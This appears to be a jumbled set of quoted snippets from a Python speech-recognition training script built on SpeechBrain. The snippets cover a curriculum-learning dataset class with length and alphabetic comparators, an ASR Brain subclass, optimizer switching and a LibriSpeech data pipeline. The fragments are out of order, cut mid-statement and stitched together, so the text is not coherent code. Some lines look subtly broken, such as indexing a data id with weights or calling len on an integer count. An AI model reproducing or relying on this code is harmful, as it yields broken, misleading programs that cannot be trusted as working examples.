import DataLoader from speechbrain.dataio.dataloader import", "_ = batch.tokens_bos # Add augmentation if specified if stage == sb.Stage.TRAIN: if", "since last intra-epoch checkpoint last_ckpt_time = time.time() # Only show progressbar if requested", "= self.hparams.error_rate_computer() def on_stage_end(self, stage, stage_loss, epoch): \"\"\"Gets called at the end of", "CurriculumOrientedDynamicDataset(DynamicItemDataset): def curriculum_based_filtered_sorted( self, key_min_value={}, key_max_value={}, key_test={}, min_weight=None, max_weight=None, weights=None, ordering_info=\"\", batch_selection=\"contiguous\", batch_size=8,", "self._random_shuffle_data_ids(data_ids) sorted_data_ids = sorted(shuffled_data_ids,key=cmp_to_key(compare)) weights = {} for index,id in enumerate(sorted_data_ids): weights[id] =", "if key == \"input_length\": res = self._input_length_comparator(key1,key2) elif key == \"output_length\": res =", "two data points based on output length\"\"\" length1 = len(self.data[key1][\"wrd\"]) length2 = len(self.data[key2][\"wrd\"])", "of epochs to run in debug mode, Default ``2``. If a non-positive number", "len(self.data[key2][\"wrd\"]) if length1 > length2: return 1 elif length1 < length2: return -1", "batch in input\"\"\" # check if we need to switch optimizer # if", "on how to order batches. - Possible Values are `contiguous`, `random`, `sorted`, `reverse-sorted`", "batch level\"\"\" data_ids = list(weights.keys()) for data_id in data_ids: data_id[weights[data_id]] = data_id data_count", "tokens_eos, length=tokens_eos_lens ) loss_ctc = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens) loss = ( self.hparams.ctc_weight", "recreate_train_dataset(self,epoch): \"\"\"Gets called at the end of a epoch. This is used to", "filtered_ids = [] for i, data_id in enumerate(weights.keys()): if select_n is not None", "for the purpose of \"fitting\" a set of modules to a set of", "return else: return def check_and_reset_optimizer(self): \"\"\"reset the optimizer if training enters stage 2\"\"\"", "res = self._alphabetic_comparator(key1,key2) res *= order # If comparison using `key` returned data", "logic, as `ordering_info` can contain multiple keys Note: Value and its meaning *", "used within the overridden methods. These will be accessible via an ``hparams`` attribute,", "modules=hparams[\"modules\"], opt_class=hparams[\"Adam\"], hparams=hparams, run_opts=run_opts, checkpointer=hparams[\"checkpointer\"], ) # adding objects to trainer: asr_brain.tokenizer =", "train_loader_kwargs=hparams[\"train_dataloader_opts\"], valid_loader_kwargs=hparams[\"valid_dataloader_opts\"], ) # Testing for k in test_datasets.keys(): # keys are test_clean,", "cmp_to_key from torch.utils.data import DataLoader from speechbrain.dataio.dataloader import LoopedLoader from speechbrain.core import Stage", "the AM is doing hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens) elif stage == sb.Stage.TEST:", "dynamic items twice. Arguments --------- key_min_value : dict Map from key (in data", "current_epoch = self.hparams.epoch_counter.current if not hasattr(self, \"switched\"): self.switched = False if isinstance(self.optimizer, torch.optim.SGD):", "reinitialize the optimizer current_epoch = self.hparams.epoch_counter.current current_optimizer = self.optimizer if current_epoch > self.hparams.stage_one_epochs:", "0 class ASR(sb.core.Brain): r\"\"\"Brain class abstracts away the details of data loops. The", "dataset at batch level\"\"\" data_ids = list(weights.keys()) for data_id in data_ids: data_id[weights[data_id]] =", "key1, key2 ): \"\"\"Compare two data points based on input length\"\"\" duration1 =", "= self.data[key2][\"wrd\"] if text1 > text2: return 1 elif text1 < text2: return", "dataset needs to be reshuffled at the end of epoch \"\"\" if self.inter_epoch_dataset_updation:", "self.sortagrad != -1: # number of epochs for which curriculum must be used", "the distributed_backend is ddp, this will generally handle multiprocess logic, like splitting the", "given, it is used directly. valid_set : Dataset, DataLoader A set of data", "behavior: * ``fit_batch()`` * ``evaluate_batch()`` * ``update_average()`` If the initialization was done with", "dynamic items) to func, will only keep data_point if bool(func(data_point[key])) == True min_weight", "for which curriculum must be used is defined if self.sortagrad < epoch: #", ": None, int If not None, will only keep data_point if weight[data_point] <", "= [] for batch in np.random.permutation(np.arange(batch_count)): start_index = batch_size * batch end_index =", "overriding the ``configure_optimizers()`` method. hparams : dict Each key:value pair should consist of", ") def text_pipeline(wrd): yield wrd tokens_list = tokenizer.encode_as_ids(wrd) yield tokens_list tokens_bos = torch.LongTensor([hparams[\"bos_index\"]]", "trained on both CTC and negative-log likelihood targets and sub-word units estimated with", "self.hparams.stage_one_epochs: del self.optimizer self.optimizer = self.hparams.SGD(self.modules.parameters()) # Load latest checkpoint to resume training", "): \"\"\"Iterate epochs and datasets to improve objective. Relies on the existence of", "weights filtered_weights = weights_filter(weights,min_value,max_value) filtered_ids = [] for i, data_id in enumerate(weights.keys()): if", "= data_id computed = self.pipeline.compute_outputs(data_point) if combined_filter(computed, key_min_value, key_max_value, key_test): filtered_data_ids.append(data_id) return filtered_data_ids", "time between saving intra-epoch checkpoints, in minutes, default: ``15.0``. If non-positive, these are", "definition). By default, this will be passed all modules in ``modules`` at the", "the train_loader (if train_set is a Dataset, not DataLoader). E.G. batch_size, num_workers. DataLoader", "epoch. This is used to handle , whether the dataset needs to be", "version of this based on specified curriculum, shares static data. The reason to", "points found. Meant for debugging. Returns ------- FilteredSortedDynamicItemDataset Shares the static data, but", "filtered_weights = weights_filter(weights,min_value,max_value) filtered_ids = [] for i, data_id in enumerate(weights.keys()): if select_n", "which curriculum must be used is defined if self.sortagrad < epoch: # recreate", "# adding objects to trainer: asr_brain.tokenizer = hparams[\"tokenizer\"] # Training asr_brain.fit( asr_brain.hparams.epoch_counter, train_data,", "are: * ``compute_forward()`` * ``compute_objectives()`` The example below illustrates how overriding these two", "hyps = None if stage == sb.Stage.TRAIN: hyps = None elif stage ==", "= self.modules.Transformer( src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index ) # output layer for ctc log-probabilities", "return weights def _custom_sorted_weights( self, data_ids, dataset_orderings ): \"\"\"Create `weights` for data points", "self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current) else: stage_stats[\"ACC\"] = self.acc_metric.summarize() current_epoch = self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if (", "= completed_steps + self.step loss, loss_ctc, loss_seq = self.fit_batch(batch) self.avg_train_loss = self.update_average( loss,", "an ``hparams`` attribute, using \"dot\" notation: e.g., self.hparams.model(x). run_opts : dict A set", "run_on_main(self._save_intra_epoch_ckpt) last_ckpt_time = time.time() # Run train \"on_stage_end\" on all processes self.on_stage_end(Stage.TRAIN, self.avg_train_loss,", "all modules in ``modules`` at the beginning of the ``fit()`` method. This behavior", "done with distributed_count > 0 and the distributed_backend is ddp, this will generally", "# hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # elif hparams[\"sorting\"] == \"descending\": # train_data = train_data.filtered_sorted(", "alphabetic order\"\"\" text1 = self.data[key1][\"wrd\"] text2 = self.data[key2][\"wrd\"] if text1 > text2: return", "= data_id data_count = len(data_ids) batch_count = math.ceil(data_count / batch_size) shuffled_data_ids = []", "hparams/transformer.yaml > python train.py hparams/conformer.yaml With the default hyperparameters, the system employs a", "weights.items(): if (isinstance(min_value,float) and value < min_value) or \\ (isinstance(max_value,float) and value >", "loss_ctc, loss_seq = self.compute_objectives(predictions, batch, sb.Stage.TRAIN) # normalize the loss by gradient_accumulation step", "certain behavior: * ``fit_batch()`` * ``evaluate_batch()`` * ``update_average()`` If the initialization was done", "nonfinite_patience (int) Number of times to ignore non-finite losses before stopping. Default: ``3``.", "batch_size) shuffled_data_ids = [] for batch in np.random.permutation(np.arange(batch_count)): start_index = batch_size * batch", "hparams[\"train_splits\"], \"dev_splits\": hparams[\"dev_splits\"], \"te_splits\": hparams[\"test_splits\"], \"save_folder\": hparams[\"data_folder\"], \"merge_lst\": hparams[\"train_splits\"], \"merge_name\": hparams[\"train_csv\"], \"skip_prep\": hparams[\"skip_prep\"],", "set(key_test.keys()) ) filtered_data_ids = [] with self.output_keys_as(temp_keys): for i, data_id in enumerate(data_ids): data_point", "= 0.0 self.step = 0 # Validation stage if valid_set is not None:", "end_index = min((batch_size+1)*batch, len(data_count)) shuffled_data_ids += data_ids[start_index:end_index] assert len(shuffled_data_ids) == len(data_ids) , \"OOPS!!", "and its meaning * 1 - key1 > key2 * -1 - key1", "as input and creates a dictionary out of it\"\"\" ordering_info = [] orderings", "= 0 # for batch in t: # # print(batch.duration) # # print(batch.wrd)", "and negative-log likelihood targets and sub-word units estimated with Byte Pairwise Encoding (BPE)", "progress of each epoch in a progressbar. \"\"\" if not ( isinstance(train_set, DataLoader)", "NotImplementedError( # \"sorting must be random, ascending or descending\" # ) valid_data =", "\"\"\"reset the optimizer if training enters stage 2\"\"\" current_epoch = self.hparams.epoch_counter.current if not", "this will generally handle multiprocess logic, like splitting the training data into subsets", "\"\"\" Comparing logic, as `ordering_info` can contain multiple keys Note: Value and its", "current_epoch > self.hparams.stage_one_epochs: self.optimizer = self.hparams.SGD(self.modules.parameters()) if self.checkpointer is not None: self.checkpointer.add_recoverable(\"optimizer\", self.optimizer)", "batch_size) else: raise NotImplementedError( \"Ordering Type must be one of random, sorted, weighted_sorted.\"", "each device and only saving a checkpoint on the main process. Arguments ---------", "of modules to a set of data. In order to use the ``fit()``", "# recreate dataset using preferred cl approach return else: # recreate dataset using", "away the details of data loops. The primary purpose of the `Brain` class", "data_ids in random order\"\"\" return np.random.permutation(data_ids) def _random_shuffled_weights( self, data_ids ): \"\"\"Create random", "( self.checkpointer is not None and self.ckpt_interval_minutes > 0 and time.time() - last_ckpt_time", ": \"<key1>:<order1>,<key2>:<order2>,........\" - Options for keys: `input_length`, `output_length`, `alphabetic` - Options for order:", "def _parse_dataset_order( self, dataset_order=\"\" ): \"\"\"Takes in `ordering_info` in string as input and", "{} for index,id in enumerate(shuffled_ids): weights[id] = index return weights def _random_shuffled_batches( self,", "torch.LongTensor(tokens_list + [hparams[\"eos_index\"]]) yield tokens_eos tokens = torch.LongTensor(tokens_list) yield tokens sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline) #", "`batch_size` and order these batches randomly to create final dataset batch_size : 8,", "if duration1 > duration2: return 1 elif duration1 < duration2: return -1 else:", "create ddp_group with the right communication protocol sb.utils.distributed.ddp_init_group(run_opts) # 1. # Dataset prep", "# train_data = train_data.filtered_sorted(sort_key=\"duration\") # # when sorting do not shuffle in dataloader", ") with torch.no_grad(): asr_brain.evaluate( test_datasets[k], max_key=\"ACC\", test_loader_kwargs=hparams[\"test_dataloader_opts\"], ) # # print(train_data) # train_set", "return an integer indicating the epoch count. train_set : Dataset, DataLoader A set", "valid_data] + [i for k, i in test_datasets.items()] # We get the tokenizer", "By properly changing the parameter files, you can try different encoders, decoders, tokens", "csv_path=hparams[\"valid_csv\"], replacements={\"data_root\": data_folder}, ) valid_data = valid_data.filtered_sorted(sort_key=\"duration\") # test is separate test_datasets =", "max_weight=None, weights=None, ordering_info=\"\", batch_selection=\"contiguous\", batch_size=8, select_n=None, ): \"\"\"Get a filtered and/or sorted version", "of epochs, for which curriculum based dataset be used. It can take one", "sb.Stage.VALID: hyps = None current_epoch = self.hparams.epoch_counter.current if current_epoch % self.hparams.valid_search_interval == 0:", ") # multi-gpu (ddp) save data preparation run_on_main( prepare_librispeech, kwargs={ \"data_folder\": hparams[\"data_folder\"], \"tr_splits\":", "user some idea of how the AM is doing hyps, _ = self.hparams.valid_search(enc_out.detach(),", "Training asr_brain.fit( asr_brain.hparams.epoch_counter, train_data, valid_data, train_loader_kwargs=hparams[\"train_dataloader_opts\"], valid_loader_kwargs=hparams[\"valid_dataloader_opts\"], ) # Testing for k in", "all epochs * ``n`` - Use curriculum learning for ``n`` number of epochs", "at the end of a epoch.\"\"\" # Compute/store important stats stage_stats = {\"loss\":", "def _filter_dataset( self, data_ids, key_min_value={}, key_max_value={}, key_test={} ): \"\"\"Returns a list of data", "tokens_lens], dim=0) loss_seq = self.hparams.seq_cost( p_seq, tokens_eos, length=tokens_eos_lens ) loss_ctc = self.hparams.ctc_cost(p_ctc, tokens,", "same method is that computing some dynamic items may be expensive, and this", "def _alphabetic_comparator( self, key1, key2 ): \"\"\"Compare two data points based on alphabetic", "it is used directly. valid_set : Dataset, DataLoader A set of data to", "isinstance(valid_set, DataLoader) or isinstance(valid_set, LoopedLoader) ): valid_set = self.make_dataloader( valid_set, stage=sb.Stage.VALID, ckpt_prefix=None, **valid_loader_kwargs,", "self.tensorboard_writer.add_scalar(\"Validation/Accuracy/tot_acc\", self.acc_metric.summarize(), epoch) # Only run validation \"on_stage_end\" on main process self.step =", "data processing pipeline through user-defined functions.\"\"\" data_folder = hparams[\"data_folder\"] # train_data = sb.dataio.dataset.DynamicItemDataset.from_csv(", "model is the average of the checkpoints from last 5 epochs. The experiment", "for all epochs * ``n`` - Use curriculum learning for ``n`` number of", "stage=stage) return loss.detach() def on_stage_start(self, stage, epoch): \"\"\"Gets called at the beginning of", "layer for seq2seq log-probabilities pred = self.modules.seq_lin(pred) p_seq = self.hparams.log_softmax(pred) # Compute outputs", "= hparams[\"ordering\"] batch_selection = hparams[\"batch_selection\"] batch_size = int(hparams[\"batch_size\"]) train_data = train_data.curriculum_based_filtered_sorted( ordering_info=ordering_info, batch_selection=batch_selection,", "shuffle in dataloader ! otherwise is pointless # hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # elif", "for ctc log-probabilities logits = self.modules.ctc_lin(enc_out) p_ctc = self.hparams.log_softmax(logits) # output layer for", "test is separate test_datasets = {} for csv_file in hparams[\"test_csv\"]: name = Path(csv_file).stem", "stage == sb.Stage.TEST: hyps, _ = self.hparams.test_search(enc_out.detach(), wav_lens) return p_ctc, p_seq, wav_lens, hyps", "func in key_test.items(): if bool(func(computed[key])): continue return False return True temp_keys = (", "tokens_eos_lens = torch.cat( [tokens_eos_lens, tokens_eos_lens], dim=0 ) tokens = torch.cat([tokens, tokens], dim=0) tokens_lens", "number of epochs for which curriculum must be used is defined if self.sortagrad", "for batch in np.random.permutation(np.arange(batch_count)): start_index = batch_size * batch end_index = min((batch_size+1)*batch, len(data_count))", "reason to implement these operations in the same method is that computing some", "randomly to create final dataset batch_size : 8, int Used to divide the", "* ``evaluate_batch()`` Arguments --------- modules : dict of str:torch.nn.Module pairs These modules are", "of options to change the runtime environment, including debug (bool) If ``True``, this", "complicated use cases, such as multiple modules that need to be updated, the", "replacements={\"data_root\": data_folder}, ) valid_data = valid_data.filtered_sorted(sort_key=\"duration\") # test is separate test_datasets = {}", "key2 ): \"\"\"Compare two data points based on alphabetic order\"\"\" text1 = self.data[key1][\"wrd\"]", "= hparams[\"batch_selection\"] batch_size = int(hparams[\"batch_size\"]) train_data = train_data.curriculum_based_filtered_sorted( ordering_info=ordering_info, batch_selection=batch_selection, batch_size=batch_size ) #", "filtered_ids.append((weights[data_id],i,data_id)) filtered_sorted_ids = [ tup[2] for tup in sorted(filtered_ids, reverse=reverse) ] return filtered_sorted_ids", "valid. progressbar : bool Whether to display the progress of each epoch in", "noprogressbar (bool) Whether to turn off progressbar when training. Default: ``False``. ckpt_interval_minutes (float)", "(960 h). The best model is the average of the checkpoints from last", "wrd in batch.wrd] self.wer_metric.append(ids, predicted_words, target_words) # compute the accuracy of the one-step-forward", "batch, stage): \"\"\"Computations needed for validation/test batches\"\"\" with torch.no_grad(): predictions = self.compute_forward(batch, stage=stage)", "recreate dataset using random shuffling return else: # recreate dataset using preferred cl", "used to load checkpoints, and will have the optimizer added to continue training", "Batchwise shuffling gone wrong.\" weights = {} for index,data_id in enumerate(shuffled_data_ids): weights[data_id] =", "step (loss / self.hparams.gradient_accumulation).backward() if self.step % self.hparams.gradient_accumulation == 0: # gradient clipping", "layer for ctc log-probabilities logits = self.modules.ctc_lin(enc_out) p_ctc = self.hparams.log_softmax(logits) # output layer", "Kwargs passed to `make_dataloader()` for making the train_loader (if train_set is a Dataset,", "up training and get better results. # train_data = train_data.filtered_sorted(sort_key=\"duration\") # # when", "0 def _output_length_comparator( self, key1, key2 ): \"\"\"Compare two data points based on", "epoch=current_epoch) if stage == sb.Stage.TRAIN: if hasattr(self.hparams, \"augmentation\"): feats = self.hparams.augmentation(feats) # forward", "single batch in input\"\"\" # check if we need to switch optimizer #", "its meaning * 1 - key1 > key2 * -1 - key1 <", "stage == sb.Stage.TEST ): stage_stats[\"WER\"] = self.wer_metric.summarize(\"error_rate\") # log stats and save checkpoint", "to continue training if interrupted. inter_epoch_dataset_updation : bool Whether dataset must be updated", "a DataLoader is given, it is used directly. train_loader_kwargs : dict Kwargs passed", "not saved. checkpointer : speechbrain.Checkpointer By default, this will be used to load", "value < min_value) or \\ (isinstance(max_value,float) and value > max_value): weights.pop(key,None) return weights", "data_ids = list(weights.keys()) for data_id in data_ids: data_id[weights[data_id]] = data_id data_count = len(data_ids)", "Arguments --------- key_min_value : dict Map from key (in data or in dynamic", "must be used is defined if self.sortagrad < epoch: # recreate dataset using", "the parameters given a single batch in input\"\"\" # check if we need", "to be used in the brain class. It also defines the data processing", "dim=0) wav_lens = torch.cat([wav_lens, wav_lens]) tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0) # compute features", "epoch in a progressbar. \"\"\" if not ( isinstance(train_set, DataLoader) or isinstance(train_set, LoopedLoader)", "of efficiency, we only perform beamsearch with limited capacity # and no LM", ") # Testing for k in test_datasets.keys(): # keys are test_clean, test_other etc", "checkpoints, and will have the optimizer added to continue training if interrupted. inter_epoch_dataset_updation", "\"switched\"): self.switched = False if isinstance(self.optimizer, torch.optim.SGD): self.switched = True if self.switched is", "# Decode token terms to words predicted_words = [ tokenizer.decode_ids(utt_seq).split(\" \") for utt_seq", "break filtered_ids.append((weights[data_id],i,data_id)) filtered_sorted_ids = [ tup[2] for tup in sorted(filtered_ids, reverse=reverse) ] return", "optimizer = self.optimizer.__class__.__name__ epoch_stats = { \"epoch\": epoch, \"lr\": lr, \"steps\": steps, \"optimizer\":", "def _random_shuffle_data_ids( self, data_ids ): \"\"\"Shuffle the data_ids in random order\"\"\" return np.random.permutation(data_ids)", "CL which takes feedback from model and reshuffles the dataset. By, default, it", "of the intermediate checkpoints # ACC is set to 1.1 so checkpointer only", "sb.dataio.dataio.read_audio(wav) return sig sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline) # 3. Define text pipeline: @sb.utils.data_pipeline.takes(\"wrd\") @sb.utils.data_pipeline.provides( \"wrd\",", "sorted version of this based on specified curriculum, shares static data. The reason", "saved. checkpointer : speechbrain.Checkpointer By default, this will be used to load checkpoints,", "that computing some dynamic items may be expensive, and this way the filtering", "list of parameters (e.g. a lambda or partial function definition). By default, this", "valid. valid_loader_kwargs : dict Kwargs passed to `make_dataloader()` for making the valid_loader (if", "loss_ctc + (1 - self.hparams.ctc_weight) * loss_seq ) if stage != sb.Stage.TRAIN: current_epoch", "import Path import speechbrain as sb from hyperpyyaml import load_hyperpyyaml from speechbrain.utils.distributed import", "call should return an integer indicating the epoch count. train_set : Dataset, DataLoader", "filtered and/or sorted version of this based on specified curriculum, shares static data.", "helps in ordering the dataset at batch level. select_n : None, int If", "how overriding these two methods is done. For more complicated use cases, such", "experiment_directory=hparams[\"output_folder\"], hyperparams_to_save=hparams_file, overrides=overrides, ) # multi-gpu (ddp) save data preparation run_on_main( prepare_librispeech, kwargs={", "yield wrd tokens_list = tokenizer.encode_as_ids(wrd) yield tokens_list tokens_bos = torch.LongTensor([hparams[\"bos_index\"]] + (tokens_list)) yield", "only on the first n data points found. Meant for debugging. Returns -------", "the implementation of the ``fit()`` method, which iterates epochs and datasets for the", "is given, it is used directly. train_loader_kwargs : dict Kwargs passed to `make_dataloader()`", "run in debug mode, Default ``2``. If a non-positive number is passed, all", "\"\"\"Compare two data points based on alphabetic order\"\"\" text1 = self.data[key1][\"wrd\"] text2 =", "of devices to run on. distributed_backend (str) One of ``ddp_nccl``, ``ddp_gloo``, ``ddp_mpi``, ``data_parallel``.", "beginning of the ``fit()`` method. This behavior can be changed by overriding the", "to the optimizer by default if they have trainable parameters, and will have", "global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/ctc_loss\", loss_ctc, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/att_loss\", loss_seq, global_step) # Debug mode only runs a", "0 # for batch in t: # # print(batch.duration) # # print(batch.wrd) #", "the rest of the intermediate checkpoints # ACC is set to 1.1 so", "not ( isinstance(train_set, DataLoader) or isinstance(train_set, LoopedLoader) ): train_set = self.make_dataloader( train_set, stage=sb.Stage.TRAIN,", "if select_n is not None and len(filtered_ids) == select_n: break filtered_ids.append((weights[data_id],i,data_id)) filtered_sorted_ids =", ": dict Map from key (in data or in dynamic items) to limit,", "def _output_length_comparator( self, key1, key2 ): \"\"\"Compare two data points based on output", "hparams[\"test_splits\"], \"save_folder\": hparams[\"data_folder\"], \"merge_lst\": hparams[\"train_splits\"], \"merge_name\": hparams[\"train_csv\"], \"skip_prep\": hparams[\"skip_prep\"], }, ) # here", "a few batches if self.debug and self.step == self.debug_batches: break if ( self.checkpointer", "This is used only if `weights` is None batch_selection : str Information on", "stage): \"\"\"Computations needed for validation/test batches\"\"\" with torch.no_grad(): predictions = self.compute_forward(batch, stage=stage) loss,", "otherwise is pointless hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # if hparams[\"sorting\"] == \"ascending\": # #", "or not. It is used in CL which takes feedback from model and", "BPE), training split (e.g, train-clean 100 rather than the full one), and many", "of data ids, filtered and sorted using custom weights\"\"\" def weights_filter(weights,min_value,max_value): \"\"\"Checks if", "shuffling gone wrong.\" weights = {} for index,data_id in enumerate(shuffled_data_ids): weights[data_id] = index", "torch.utils.data import DataLoader from speechbrain.dataio.dataloader import LoopedLoader from speechbrain.core import Stage import time", "inter_epoch_dataset_updation=False, sortagrad=-1 ): super().__init__( modules=modules, opt_class=opt_class, hparams=hparams, run_opts=run_opts, checkpointer=checkpointer ) # save attributes", "on the top of decoder probabilities. The neural network is trained on both", "one should sub-class the ``Brain`` class and override any methods for which the", "prepare_librispeech, kwargs={ \"data_folder\": hparams[\"data_folder\"], \"tr_splits\": hparams[\"train_splits\"], \"dev_splits\": hparams[\"dev_splits\"], \"te_splits\": hparams[\"test_splits\"], \"save_folder\": hparams[\"data_folder\"], \"merge_lst\":", "two, reinitialize the optimizer current_epoch = self.hparams.epoch_counter.current current_optimizer = self.optimizer if current_epoch >", "the averaged checkpoint self.checkpointer.save_and_keep_only( meta={\"ACC\": 1.1, \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=1, ) def recreate_train_dataset(self,epoch):", "data_ids[start_index:end_index] assert len(shuffled_data_ids) == len(data_ids) , \"OOPS!! Batchwise shuffling gone wrong.\" weights =", ") # Debug mode only runs a few epochs if self.debug and epoch", "self.switched = True if self.switched is True: return if current_epoch > self.hparams.stage_one_epochs: self.optimizer", "here we create the datasets objects as well as tokenization and encoding train_data,", "ordering_info = hparams[\"ordering\"] batch_selection = hparams[\"batch_selection\"] batch_size = int(hparams[\"batch_size\"]) train_data = train_data.curriculum_based_filtered_sorted( ordering_info=ordering_info,", "load checkpoints, and will have the optimizer added to continue training if interrupted.", "elif hparams[\"sorting\"] == \"random\": # pass # else: # raise NotImplementedError( # \"sorting", "res = self._input_length_comparator(key1,key2) elif key == \"output_length\": res = self._output_length_comparator(key1,key2) elif key ==", "valid_set is not None: self.on_stage_start(Stage.VALID, epoch) self.modules.eval() avg_valid_loss = 0.0 with torch.no_grad(): for", "if current_epoch > self.hparams.stage_one_epochs: del self.optimizer self.optimizer = self.hparams.SGD(self.modules.parameters()) # Load latest checkpoint", "batches. - Possible Values are `contiguous`, `random`, `sorted`, `reverse-sorted` - Example: * \"random\"", "training summary to tensorboard self.tensorboard_writer.add_scalar(\"Train/Loss/tot_loss\", loss, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/ctc_loss\", loss_ctc, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/att_loss\", loss_seq, global_step)", "can (or should) be overridden. The following methods are used and expected to", "and this way the filtering and sorting steps don't need to compute the", "epochs By default, it is ``-1``. \"\"\" def __init__( self, modules=None, opt_class=None, hparams=None,", "self.make_dataloader( train_set, stage=sb.Stage.TRAIN, **train_loader_kwargs ) if valid_set is not None and not (", ": Dataset, DataLoader A set of data to use for validation. If a", "weights def _custom_sorted_weights( self, data_ids, dataset_orderings ): \"\"\"Create `weights` for data points using", "trainable parameters, and will have ``train()``/``eval()`` called on them. opt_class : torch.optim class", "data. The reason to implement these operations in the same method is that", "these operations in the same method is that computing some dynamic items may", ": bool Whether to display the progress of each epoch in a progressbar.", "kwargs are all valid. valid_loader_kwargs : dict Kwargs passed to `make_dataloader()` for making", "only with cuda. max_grad_norm (float) Default implementation of ``fit_batch()`` uses ``clip_grad_norm_`` with this", "if ( current_epoch % valid_search_interval == 0 or stage == sb.Stage.TEST ): stage_stats[\"WER\"]", "Write validation summary to tensorboard self.tensorboard_writer.add_scalar(\"Validation/Loss/tot_loss\", avg_valid_loss, epoch) self.tensorboard_writer.add_scalar(\"Validation/Accuracy/tot_acc\", self.acc_metric.summarize(), epoch) # Only", "\\ (isinstance(max_value,float) and value > max_value): weights.pop(key,None) return weights filtered_weights = weights_filter(weights,min_value,max_value) filtered_ids", "top of decoder probabilities. The neural network is trained on both CTC and", "data points based on alphabetic order\"\"\" text1 = self.data[key1][\"wrd\"] text2 = self.data[key2][\"wrd\"] if", "\"tr_splits\": hparams[\"train_splits\"], \"dev_splits\": hparams[\"dev_splits\"], \"te_splits\": hparams[\"test_splits\"], \"save_folder\": hparams[\"data_folder\"], \"merge_lst\": hparams[\"train_splits\"], \"merge_name\": hparams[\"train_csv\"], \"skip_prep\":", "batch_selection == \"sorted\": pass elif batch_selection == \"reverse-sorted\": weights = self._reverse_sort_batches(weights, batch_size) else:", "LM from HuggingFace (or elsewhere depending on # # the path given in", "order.split(\":\") ordering_info.append({\"key\":column,\"order\":order}) return ordering_info def _random_shuffle_data_ids( self, data_ids ): \"\"\"Shuffle the data_ids in", "be updated every between epochs or not. It is used in CL which", "max_value = float(max_value) for key,value in weights.items(): if (isinstance(min_value,float) and value < min_value)", "self.train_set, initial=self.step, dynamic_ncols=True, disable=not enable, ) as t: for batch in t: self.step", "data loops. The primary purpose of the `Brain` class is the implementation of", "\"random\": # pass # else: # raise NotImplementedError( # \"sorting must be random,", "weight[data_point] < max_weight weights : None, dict Map from data_id to weight, these", "ordering_info=ordering_info, batch_selection=batch_selection, batch_size=batch_size ) # when sorting do not shuffle in dataloader !", "the output probabilities.\"\"\" batch = batch.to(self.device) wavs, wav_lens = batch.sig tokens_bos, _ =", "for making the valid_loader (if valid_set is a Dataset, not DataLoader). E.g., batch_size,", "= time.time() # Only show progressbar if requested and main_process enable = progressbar", "self.on_stage_start(Stage.VALID, epoch) self.modules.eval() avg_valid_loss = 0.0 with torch.no_grad(): for batch in tqdm( valid_set,", "use the ``fit()`` method, one should sub-class the ``Brain`` class and override any", "support a large variety of different systems. By properly changing the parameter files,", "tokens_eos], dim=0) tokens_eos_lens = torch.cat( [tokens_eos_lens, tokens_eos_lens], dim=0 ) tokens = torch.cat([tokens, tokens],", "\"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=5, ) elif stage == sb.Stage.TEST: self.hparams.train_logger.log_stats( stats_meta={\"Epoch loaded\": self.hparams.epoch_counter.current},", ") as t: for batch in t: self.step += 1 global_step = completed_steps", "to weight, these weight(s) will be used to sort the dataset. ordering_info :", "not DataLoader). E.g., batch_size, num_workers. DataLoader kwargs are all valid. progressbar : bool", "length2: return -1 else: return 0 def _alphabetic_comparator( self, key1, key2 ): \"\"\"Compare", "dict Map from key (in data or in dynamic items) to func, will", "self.data[key2][\"wrd\"] if text1 > text2: return 1 elif text1 < text2: return -1", "key_min_value, key_max_value, key_test): \"\"\"Checks if the data example fulfills the filtering criteria\"\"\" for", "of \"fitting\" a set of modules to a set of data. In order", "run_on_main( prepare_librispeech, kwargs={ \"data_folder\": hparams[\"data_folder\"], \"tr_splits\": hparams[\"train_splits\"], \"dev_splits\": hparams[\"dev_splits\"], \"te_splits\": hparams[\"test_splits\"], \"save_folder\": hparams[\"data_folder\"],", "test_datasets = {} for csv_file in hparams[\"test_csv\"]: name = Path(csv_file).stem test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv(", "from speechbrain.dataio.dataset import DynamicItemDataset, FilteredSortedDynamicItemDataset from speechbrain.dataio.sampler import ReproducibleRandomSampler from tqdm.contrib import tqdm", "Number of devices to run on. distributed_backend (str) One of ``ddp_nccl``, ``ddp_gloo``, ``ddp_mpi``,", "batch.tokens if hasattr(self.modules, \"env_corrupt\") and stage == sb.Stage.TRAIN: tokens_eos = torch.cat([tokens_eos, tokens_eos], dim=0)", "= self.hparams.valid_search(enc_out.detach(), wav_lens) elif stage == sb.Stage.TEST: hyps, _ = self.hparams.test_search(enc_out.detach(), wav_lens) return", "used directly. train_loader_kwargs : dict Kwargs passed to `make_dataloader()` for making the train_loader", "than the full one), and many other possible variations. Authors * <NAME> 2020", "Note: Value and its meaning * 1 - key1 > key2 * -1", "key_test.items(): if bool(func(computed[key])): continue return False return True temp_keys = ( set(key_min_value.keys()) |", "= self._parse_dataset_order(ordering_info) ordering_type = \"sorted\" if len(dataset_ordering) > 0 else \"random\" filtered_data_ids =", "def on_stage_start(self, stage, epoch): \"\"\"Gets called at the beginning of each epoch\"\"\" if", "and value < min_value) or \\ (isinstance(max_value,float) and value > max_value): weights.pop(key,None) return", "keep data_point if bool(func(data_point[key])) == True min_weight : None, int If not None,", "* ``fit_batch()`` * ``evaluate_batch()`` * ``update_average()`` If the initialization was done with distributed_count", "float(self.data[key1][\"duration\"]) duration2 = float(self.data[key2][\"duration\"]) if duration1 > duration2: return 1 elif duration1 <", "`ordering_info`, divide the dataset into batches of size `batch_size` and order these batches", "def fit_batch(self, batch): \"\"\"Train the parameters given a single batch in input\"\"\" #", "of the one-step-forward prediction self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens) return loss , 